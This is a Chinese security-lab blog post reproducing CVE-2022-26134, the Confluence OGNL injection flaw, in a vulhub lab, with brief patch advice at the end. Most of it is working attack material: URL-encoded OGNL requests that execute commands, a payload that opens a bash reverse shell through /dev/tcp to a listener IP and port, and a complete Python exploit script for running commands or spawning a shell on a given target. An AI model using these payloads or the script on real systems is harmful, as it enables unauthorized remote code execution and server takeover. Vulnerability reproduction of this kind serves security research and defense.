戟星安全实验室
本文约5700字,阅读约需10分钟。
0x00 漏洞描述
0x01 影响版本
Confluence Server and Data Center >= 1.3.0Confluence Server and Data Center < 7.4.17onfluence Server and Data Center < 7.13.7Confluence Server and Data Center < 7.14.3Confluence Server and Data Center < 7.15.2Confluence Server and Data Center < 7.16.4Confluence Server and Data Center < 7.17.4Confluence Server and Data Center < 7.18.1
0x02 漏洞分析
0x03 漏洞复现
|
组件 |
版本 |
|
|
|
|
vulhub-master |
基础环境
启动漏洞环境:
cd /vulhub-master/confluence/CVE-2022-26134
sudo dockers-compose up -d
环境启动后访问http://your-ip:8090,会进入安装引导,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书
填写邮箱后会发送一条邮件,然后按步骤完成注册
注册完毕后获取key
得到key后,在http://your-ip:8090界面输入key:
跳转到填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres
搭建成功,返回登录
漏洞验证
使用burpsuite抓包,修改OGNL表达式,使用url进行编码且构造数据包
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: 192.168.42.71:8090Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=1BCE0EF1C47E7DCAECF490BF52AAE968Connection: close
发现响应中显示代码执行的结果
深度利用
getshell
攻击payload,且进行url编码改包
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/ tcp/192.168.42.71/7777 0>&1').start()")}GET /%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.42.71/7777%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1Host: 192.168.42.71:8090Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=1BCE0EF1C47E7DCAECF490BF52AAE968Connection: close
exp反弹shell
EXP 编写
#!/usr/bin/python3# coding: utf-8# cve2022-26134# by: lxxlimport urllibimport requestsimport reimport sysfrom bs4 import BeautifulSoupimport urllib3urllib3.disable_warnings()import argparsedef check(url):r = requests.get(url + "/login.action", verify=False)if (r.status_code == 200):filter_version = re.findall("<span id='footer-build-information'>.*</span>", r.text)if (len(filter_version) >= 1):version = filter_version[0].split("'>")[1].split('</')[0]return versionelse:return Falseelse:return urldef exploit(url, command):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','Content-Type': 'application/x-www-form-urlencoded','Accept': '*/*',}r = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + command + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/',headers=headers, verify=False, allow_redirects=False)if (r.status_code == 302):return r.headers['X-Cmd-Response']else:return Falsedef shell():shell = ip + "/" + portshell1 = "'bash','-c','bash -i >& "exp = shell1 + "/dev/tcp/" + shell + " 0>&1'"payload1 = '''${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('''payload2 = exp + ''').start()")}/'''payloads = payload1 + payload2s = urllib.parse.quote(payloads)return sif __name__ == "__main__":parser = argparse.ArgumentParser(description='cve2022-26134')parser.add_argument('-u', '--url', help='target url', required=False)parser.add_argument('-c', '--command', help='command', required=False)parser.add_argument('-i', '--lhost', help='type', required=False)parser.add_argument('-p', '--lport', help='type', required=False)args = parser.parse_args()cmd = args.commandip = args.lhostport = args.lportif (len(sys.argv) < 3):print("USE: python3 " + sys.argv[0] + " -u https://target.com -c command")print("ex: python3 " + sys.argv[0] + " -u https://target.com -i your.ip -p your.port")if (sys.argv[3] == "-i"):target = args.urlip = args.lhostport = args.lporte = requests.get(target + shell())if e.status_code == 200 or e.status_code == 302:print("[+] exploit success")else:print("[-] exploit failed")else:target = args.urlcmd = cmd.replace("'", "")version = check(target)print("============ GET Confluence Version ============")if (version):print("Version: " + version)else:print("Version: Not Found")print(exploit(target, cmd))
0x04 修复建议
升级Atlassian Confluence Server and Data Center至安全版本。
临时缓解方案:下载官方发布的xwork-1.0.3-atlassian-10.jar替换confluence/WEB-INF/lib/目录下原来的xwork jar文件,并重启Confluence。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,戟星安全实验室及文章作者不为此承担任何责任。
戟星安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经戟星安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
戟星安全实验室
# 长按二维码 关注我们 #
原文始发于微信公众号(戟星安全实验室):CVE-2022-26134漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论